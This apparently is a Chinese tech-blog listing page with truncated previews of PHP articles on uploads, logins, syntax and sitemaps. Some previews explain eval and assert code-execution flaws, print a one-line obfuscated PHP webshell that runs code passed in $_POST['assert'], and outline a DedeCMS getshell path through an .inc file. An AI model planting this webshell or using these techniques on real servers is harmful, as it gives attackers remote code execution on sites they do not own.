代码执行漏洞代码执行漏洞是指应用程序本身过滤不严,用户可以通过请求将代码注入到应用中执行,当应用在调用一些能将字符串转化成代码的函数(如php中的eval)时,没有考虑到用户是否能控制这个字符串,造成代码注入。挖掘思路:存在可执行代码的危险函数,用户能控制函数的输入。常见危险函数eval和asser ...
分类:
Web程序 时间:
2019-01-28 20:08:14
阅读次数:
193
前端代码 文件路径:application/index/view/index/index.html 效果图: PHP代码 文件路径:application/index/controller/Index.php 上传测试 1. 上传一张图片 2. 上传成功 3. 点击查看 4. 查看图片 5. 查看上 ...
分类:
Web程序 时间:
2019-01-26 20:23:01
阅读次数:
240
《电子商城实录 项目目录的结构搭建及其说明2》中方法优化 Framework.class.php代码加入static: <?php//核心启动类class Framework{ public static function run(){ echo "hello,wrold!"; } //初始化方法 ...
分类:
其他好文 时间:
2019-01-23 01:22:12
阅读次数:
187
首先创建数据库: 数据库名:kinoko1824; 创建表(用户表和成绩表): 用户表名:user 主键:uid 设置自增 成绩表名:score 主键:sid 设置自增 数据库创建好之后新建register.html,代码如下: 新建register.php,代码如下: 新建login.html,代 ...
分类:
数据库 时间:
2019-01-22 21:50:30
阅读次数:
217
<?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?> assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数) 因为$array[ ...
分类:
Web程序 时间:
2019-01-21 21:39:43
阅读次数:
209
php三种注释方式 (1) /* 多行注释 */ (2) //单行注释 (3) #结束后面注释 php代码四种书写格式 (1)<?php code ?> (2)<? code ?> 短标签 (3)<% code %> asp标签 (4)<script language="php"> code </s ...
分类:
Web程序 时间:
2019-01-18 19:58:54
阅读次数:
150
这是一款利PHP对百度搜索下拉框提示免费代码实现参数配置调试的程序源代码. 由想要对网站进行搜索下拉调试的站长朋友们进行方便、快速的效果演示,具体参考下面的PHP代码. 如何使用? 请新建一份PHP文档,并将下面PHP代码粘贴进去,然后通过浏览器访问访该文档即可进行预览openSug各种效果 1 < ...
分类:
Web程序 时间:
2019-01-18 15:03:51
阅读次数:
212
代码标识 PHP代码以<?php 开头,以?>结尾,且可以放置在文档中的任何位置 [注意]PHP也允许使用短标记 <? 和 ?>,但不鼓励使用。只有通过激活php.ini中的 short_open_tag 配置指令或者在编译PHP时使用了配置选项--enable-short-tags时才能使用短标记 ...
分类:
Web程序 时间:
2019-01-06 16:37:38
阅读次数:
200
在这个帖子里我把两个洞一起写出来。 第一个是常见的思路,把语句写入inc文件,然后在其他的include语句中,包含了恶意代码进而getshell。漏洞代码在:/dede/sys_verifies.php 代码如下: else if ($action == 'getfiles') { if(!iss ...
分类:
系统相关 时间:
2019-01-06 00:04:45
阅读次数:
281
让这个代码更加完善,可以同时生成首页、文章、单页面、分类和标签的 sitemap! 一、PHP 代码 三、纯静态 Linux 定时任务+wget 定时生成 sitemap.xml 具体实现:将 sitemap.php 放到某个不为人知的目录,然后定时使用 wget 去请求这个文件,并将数据保存为 s ...
分类:
Web程序 时间:
2019-01-04 01:15:26
阅读次数:
261
